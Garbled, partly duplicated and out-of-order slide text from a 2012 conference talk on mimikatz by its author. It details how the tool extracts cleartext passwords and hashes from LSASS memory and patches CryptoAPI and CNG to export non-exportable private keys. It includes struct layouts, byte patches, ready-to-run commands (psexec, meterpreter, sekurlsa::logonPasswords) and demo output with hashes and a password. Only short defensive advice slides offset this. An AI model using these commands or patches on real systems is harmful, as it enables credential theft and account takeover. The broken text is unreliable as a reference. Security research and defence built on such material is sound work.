- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
